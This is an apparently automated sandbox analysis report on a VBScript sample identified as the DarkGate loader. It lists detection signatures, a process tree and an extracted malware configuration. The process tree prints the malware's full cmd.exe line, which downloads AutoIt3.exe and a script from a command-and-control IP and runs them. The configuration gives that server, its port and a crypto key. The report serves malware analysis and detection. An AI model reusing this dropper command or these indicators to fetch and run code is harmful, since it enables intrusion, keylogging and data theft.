Windows
Analysis Report
1.vbs
Overview
General Information
Detection
DarkGate
Score | Range | Whitelisted | Confidence
---|---|---|---
100 | 0 - 100 | false | 100%
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected DarkGate
Sigma detected: DarkGate
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Potential malicious VBS script found (suspicious strings)
Uses known network protocols on non-standard ports
C2 URLs / IPs found in malware configuration
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Found decision node followed by non-executed suspicious APIs
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains functionality for execution timing, often used to detect debuggers
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Yara detected Keylogger Generic
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Classification
- System is w10x64
  - wscript.exe (PID: 5528, cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1.vbs", MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    - cmd.exe (PID: 6764, cmdline: "C:\Windows\System32\cmd.exe" /c mkdir c:\bpzs & cd /d c:\bpzs & copy c:\windows\system32\curl.exe bpzs.exe & bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 & bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi & Autoit3.exe szkzjr.au3, MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      - conhost.exe (PID: 6808, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      - bpzs.exe (PID: 6948, cmdline: bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351, MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
      - bpzs.exe (PID: 6852, cmdline: bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi, MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
      - Autoit3.exe (PID: 6116, cmdline: Autoit3.exe szkzjr.au3, MD5: C56B5F0201A3B3DE53E561FE76912BFD)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link
---|---|---|---|---
DarkGate | First documented in 2018, DarkGate is a commodity loader with features that include the ability to download and execute files to memory, a Hidden Virtual Network Computing (HVNC) module, keylogging, information-stealing capabilities, and privilege escalation. DarkGate makes use of legitimate AutoIt files and typically runs multiple AutoIt scripts. New versions of DarkGate have been advertised on a Russian language eCrime forum since May 2023. | No Attribution | | 
{"C2 url": ["http://94.228.169.143"], "c2_port": 2351, "startup_persistence": true, "rootkit": true, "anti_vm": false, "check_disk": false, "min_disk": 100, "anti_analysis": true, "check_ram": false, "min_ram": 4096, "check_xeon": false, "internal_mutex": "txtMut", "crypter_rawstub": false, "crypter_dll": false, "crypter_au3": true, "flag_14": 4, "crypto_key": "IDmfxvToPtabWZ", "c2_ping_interval": 4, "anti_debug": true, "flag_18": true, "flag_19": true, "flag_22": 8080, "flag_23": "AA11", "flag_24": false, "flag_25": 60, "flag_26": true, "flag_27": false, "flag_28": false, "flag_29": true}
Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_DarkGate_1 | Yara detected DarkGate | Joe Security | 
 | JoeSecurity_DarkGate_1 | Yara detected DarkGate | Joe Security | 
 | JoeSecurity_DarkGate_1 | Yara detected DarkGate | Joe Security | 
 | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | 
 | JoeSecurity_DarkGate_1 | Yara detected DarkGate | Joe Security | 
Stealing of Sensitive Information
Source: Snort IDS alert (Author: Joe Security)

Field | Value
---|---
Timestamp | 09/23/23-08:02:03.355684
Source IP | 94.228.169.143
Destination IP | 192.168.2.3
Source Port | 2351
Destination Port | 49713
SID | 2048098
Protocol | TCP
Classtype | A Network Trojan was detected
AV Detection

Source | Detail
---|---
Malware Configuration Extractor | 
Virustotal | 
Virustotal | 
Virustotal | 
Code function | 4_2_00007FF7F8D3FD00
Code function | 4_2_00007FF7F8D3FCF0
Code function | 4_2_00007FF7F8D3FCA0
Code function | 4_2_00007FF7F8D2486C